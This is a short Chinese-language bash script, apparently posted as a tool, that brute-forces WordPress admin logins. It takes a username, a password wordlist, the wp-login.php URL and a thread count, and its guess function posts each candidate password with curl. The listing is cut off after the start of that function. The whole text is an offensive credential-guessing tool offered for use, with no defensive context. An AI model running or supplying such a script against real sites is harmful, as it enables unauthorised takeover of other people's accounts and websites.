WordPress后台密码暴力破解程序,请先确认机器已安装curl
01 | #!/bin/bash |
02 | #by leo108 |
03 | #使用方式:./wp-pwd.sh 用户名 字典 登录页面 线程数 |
04 | #例如: ./wp-pwd.sh leo 1.txt http://xxx.com/wp-login.php 15 |
05 | user=$1 |
06 | zidian=$2 |
07 | url=$3 |
08 | thread=$4 |
09 | function guess { |
10 | curl -s -d "log=$user&pwd=$1" $url >> $1.html |
11 | l=$( wc -l $1.html| awk -F[: " " ]+ '{print $1}' ) |
12 | ... |